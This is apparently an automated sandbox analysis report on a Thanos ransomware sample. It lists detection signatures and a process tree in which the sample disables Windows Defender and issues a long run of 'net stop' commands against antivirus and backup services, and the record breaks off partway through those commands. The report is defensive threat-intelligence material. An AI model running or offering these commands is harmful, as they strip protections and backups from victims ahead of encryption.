Analysis

  • max time kernel
    153s
  • max time network
    153s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250314-en
  • resource tags

    arch:x64arch:x86image:win11-20250314-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09/04/2025, 07:52

General

  • Target

    JRKGaming

  • Size

    171KB

  • MD5

    b7724bd9acf1f31e191a557939d57c26

  • SHA1

    4f9814293decf0fc6b53e477b683e9c280085b02

  • SHA256

    4a09528f4ab9eddacb1944e3c2fae6f24cb37c267f7c9360b494c5edfc62365b

  • SHA512

    66cf31adeaba3acec45e38e1cd1c27e11f36893773cb43ba647c613d7973434631ab954a5aaa0f04c5ab49de60fcbd812d098d396813ad7ed45de8d4b615ab6c

  • SSDEEP

    3072:16zq3FoSJQkHZIWNDEZJ3hmhDj7QOUCxq1XB5CkGHSvsuWDp8c/saqk3V97xZDIc:W9BsDp8c/saqk3V97HILqgIDSF5IQ9x8

Malware Config

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Thanos Ransomware

    Ransomware-as-a-service (RaaS) sold through underground forums.

  • Thanos executable 1 IoCs
  • Thanos family
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (51) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file 3 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 11 IoCs
  • Enumerates connected drives 3 TTPs 16 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • NTFS ADS 2 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\JRKGaming
    1⤵
      PID:5320
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe"
      1⤵
      • Drops file in Windows directory
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa9400dcf8,0x7ffa9400dd04,0x7ffa9400dd10
        2⤵
          PID:2044
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1936,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1928 /prefetch:2
          2⤵
            PID:4888
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2232,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2248 /prefetch:11
            2⤵
            • Downloads MZ/PE file
            PID:4960
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2356,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2372 /prefetch:13
            2⤵
              PID:4988
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3248 /prefetch:1
              2⤵
                PID:3400
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3432 /prefetch:1
                2⤵
                  PID:5536
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4252 /prefetch:9
                  2⤵
                    PID:5932
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4676,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4696 /prefetch:1
                    2⤵
                      PID:5780
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5224,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5240 /prefetch:14
                      2⤵
                        PID:2008
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5460,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5476 /prefetch:14
                        2⤵
                          PID:3480
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5472,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5588 /prefetch:14
                          2⤵
                            PID:236
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5572,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5340 /prefetch:14
                            2⤵
                              PID:640
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4556,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5360 /prefetch:14
                              2⤵
                                PID:1956
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5788,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5328 /prefetch:14
                                2⤵
                                  PID:3960
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5328,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5984 /prefetch:1
                                  2⤵
                                    PID:656
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5964,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=6128 /prefetch:1
                                    2⤵
                                      PID:712
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5284,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4748 /prefetch:14
                                      2⤵
                                        PID:3592
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3212,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4700 /prefetch:14
                                        2⤵
                                          PID:408
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5768,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4236 /prefetch:14
                                          2⤵
                                            PID:4168
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4756,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5372 /prefetch:14
                                            2⤵
                                            • Subvert Trust Controls: Mark-of-the-Web Bypass
                                            • NTFS ADS
                                            PID:4100
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5492,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5320 /prefetch:9
                                            2⤵
                                              PID:2820
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1164,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3540 /prefetch:10
                                              2⤵
                                                PID:5888
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3596,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3484 /prefetch:14
                                                2⤵
                                                • Subvert Trust Controls: Mark-of-the-Web Bypass
                                                • NTFS ADS
                                                PID:6524
                                              • C:\Users\Admin\Downloads\thing.exe
                                                "C:\Users\Admin\Downloads\thing.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:6196
                                                • C:\Users\Admin\Downloads\thing.exe
                                                  "C:\Users\Admin\Downloads\thing.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:1080
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                              1⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:1944
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa9400dcf8,0x7ffa9400dd04,0x7ffa9400dd10
                                                2⤵
                                                  PID:2200
                                              • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                1⤵
                                                  PID:936
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                  1⤵
                                                    PID:3552
                                                  • C:\Users\Admin\Desktop\Thanos.exe
                                                    "C:\Users\Admin\Desktop\Thanos.exe"
                                                    1⤵
                                                    • Modifies Windows Defender DisableAntiSpyware settings
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    • Modifies Windows Defender TamperProtection settings
                                                    • Downloads MZ/PE file
                                                    • Drops startup file
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of SendNotifyMessage
                                                    PID:2404
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      "powershell" Get-MpPreference -verbose
                                                      2⤵
                                                        PID:2904
                                                      • C:\Windows\SYSTEM32\net.exe
                                                        "net.exe" stop avpsus /y
                                                        2⤵
                                                          PID:4948
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 stop avpsus /y
                                                            3⤵
                                                              PID:972
                                                          • C:\Windows\SYSTEM32\net.exe
                                                            "net.exe" stop McAfeeDLPAgentService /y
                                                            2⤵
                                                              PID:5228
                                                              • C:\Windows\system32\net1.exe
                                                                C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
                                                                3⤵
                                                                  PID:3404
                                                              • C:\Windows\SYSTEM32\net.exe
                                                                "net.exe" stop mfewc /y
                                                                2⤵
                                                                  PID:4456
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 stop mfewc /y
                                                                    3⤵
                                                                      PID:2388
                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                    "net.exe" stop BMR Boot Service /y
                                                                    2⤵
                                                                      PID:3532
                                                                      • C:\Windows\system32\net1.exe
                                                                        C:\Windows\system32\net1 stop BMR Boot Service /y
                                                                        3⤵
                                                                          PID:1520
                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                        "net.exe" stop NetBackup BMR MTFTP Service /y
                                                                        2⤵
                                                                          PID:1256
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                                                                            3⤵
                                                                              PID:6376
                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                            "net.exe" stop DefWatch /y
                                                                            2⤵
                                                                              PID:3000
                                                                              • C:\Windows\system32\net1.exe
                                                                                C:\Windows\system32\net1 stop DefWatch /y
                                                                                3⤵
                                                                                  PID:5460
                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                "net.exe" stop ccEvtMgr /y
                                                                                2⤵
                                                                                  PID:4608
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 stop ccEvtMgr /y
                                                                                    3⤵
                                                                                      PID:6352
                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                    "net.exe" stop ccSetMgr /y
                                                                                    2⤵
                                                                                      PID:5312
                                                                                      • C:\Windows\system32\net1.exe
                                                                                        C:\Windows\system32\net1 stop ccSetMgr /y
                                                                                        3⤵
                                                                                          PID:5780
                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                        "net.exe" stop SavRoam /y
                                                                                        2⤵
                                                                                          PID:3156
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 stop SavRoam /y
                                                                                            3⤵
                                                                                              PID:6504
                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                            "net.exe" stop RTVscan /y
                                                                                            2⤵
                                                                                              PID:1180
                                                                                              • C:\Windows\system32\net1.exe
                                                                                                C:\Windows\system32\net1 stop RTVscan /y
                                                                                                3⤵
                                                                                                  PID:2584
                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                "net.exe" stop QBFCService /y
                                                                                                2⤵
                                                                                                  PID:1904
                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                    C:\Windows\system32\net1 stop QBFCService /y
                                                                                                    3⤵
                                                                                                      PID:2396
                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                    "net.exe" stop QBIDPService /y
                                                                                                    2⤵
                                                                                                      PID:5548
                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                        C:\Windows\system32\net1 stop QBIDPService /y
                                                                                                        3⤵
                                                                                                          PID:6472
                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                        "net.exe" stop Intuit.QuickBooks.FCS /y
                                                                                                        2⤵
                                                                                                          PID:2100
                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                            C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                                                                                            3⤵
                                                                                                              PID:6452
                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                            "net.exe" stop QBCFMonitorService /y
                                                                                                            2⤵
                                                                                                              PID:3736
                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                                                                                3⤵
                                                                                                                  PID:6632
                                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                                "net.exe" stop YooBackup /y
                                                                                                                2⤵
                                                                                                                  PID:5352
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop YooBackup /y
                                                                                                                    3⤵
                                                                                                                      PID:6568
                                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                                    "net.exe" stop YooIT /y
                                                                                                                    2⤵
                                                                                                                      PID:5500
                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                        C:\Windows\system32\net1 stop YooIT /y
                                                                                                                        3⤵
                                                                                                                          PID:6512
                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                        "net.exe" stop zhudongfangyu /y
                                                                                                                        2⤵
                                                                                                                          PID:3600
                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                            C:\Windows\system32\net1 stop zhudongfangyu /y
                                                                                                                            3⤵
                                                                                                                              PID:6440
                                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                                            "net.exe" stop stc_raw_agent /y
                                                                                                                            2⤵
                                                                                                                              PID:4740
                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                                                                                3⤵
                                                                                                                                  PID:6624
                                                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                                                "net.exe" stop VSNAPVSS /y
                                                                                                                                2⤵
                                                                                                                                  PID:680
                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                    C:\Windows\system32\net1 stop VSNAPVSS /y
                                                                                                                                    3⤵
                                                                                                                                      PID:6812
                                                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                                                    "net.exe" stop VeeamTransportSvc /y
                                                                                                                                    2⤵
                                                                                                                                      PID:5592
                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                        C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                                                                                        3⤵
                                                                                                                                          PID:6712
                                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                                        "net.exe" stop VeeamDeploymentService /y
                                                                                                                                        2⤵
                                                                                                                                          PID:1564
                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                            C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                                                                                            3⤵
                                                                                                                                              PID:6488
                                                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                                                            "net.exe" stop VeeamNFSSvc /y
                                                                                                                                            2⤵
                                                                                                                                              PID:6128
                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                                                                                                3⤵
                                                                                                                                                  PID:6704
                                                                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                "net.exe" stop veeam /y
                                                                                                                                                2⤵
                                                                                                                                                  PID:3092
                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                    C:\Windows\system32\net1 stop veeam /y
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6388
                                                                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                    "net.exe" stop PDVFSService /y
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4476
                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                        C:\Windows\system32\net1 stop PDVFSService /y
                                                                                                                                                        3⤵
                                                                                                                                                          PID:6480
                                                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                        "net.exe" stop BackupExecVSSProvider /y
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4292
                                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                                            C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                                                                                                                            3⤵
                                                                                                                                                              PID:6592
                                                                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                            "net.exe" stop BackupExecAgentAccelerator /y
                                                                                                                                                            2⤵
                                                                                                                                                              PID:736
                                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                                C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:6496
                                                                                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                "net.exe" stop BackupExecAgentBrowser /y
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:4364
                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6552
                                                                                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                    "net.exe" stop BackupExecDiveciMediaService /y
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4208
                                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                                        C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:6148
                                                                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                        "net.exe" stop BackupExecJobEngine /y
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2804
                                                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                                                            C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:6188
                                                                                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                            "net.exe" stop BackupExecManagementService /y
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:4288
                                                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                                                C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:6740
                                                                                                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                                "net.exe" stop BackupExecRPCService /y
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:5680
                                                                                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                                                                                    C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:6576
                                                                                                                                                                                  • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                                    "net.exe" stop AcrSch2Svc /y
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:2996
                                                                                                                                                                                      • C:\Windows\system32\net1.exe
                                                                                                                                                                                        C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:6600
                                                                                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                                        "net.exe" stop AcronisAgent /y
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:5160
                                                                                                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                                                                                                            C:\Windows\system32\net1 stop AcronisAgent /y
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6460
                                                                                                                                                                                          • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                                            "net.exe" stop CASAD2DWebSvc /y
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2548
                                                                                                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                                                                                                C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:6764
                                                                                                                                                                                              • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                                                                "net.exe" stop CAARCUpdateSvc /y
                                                                                                                                                                                                2⤵
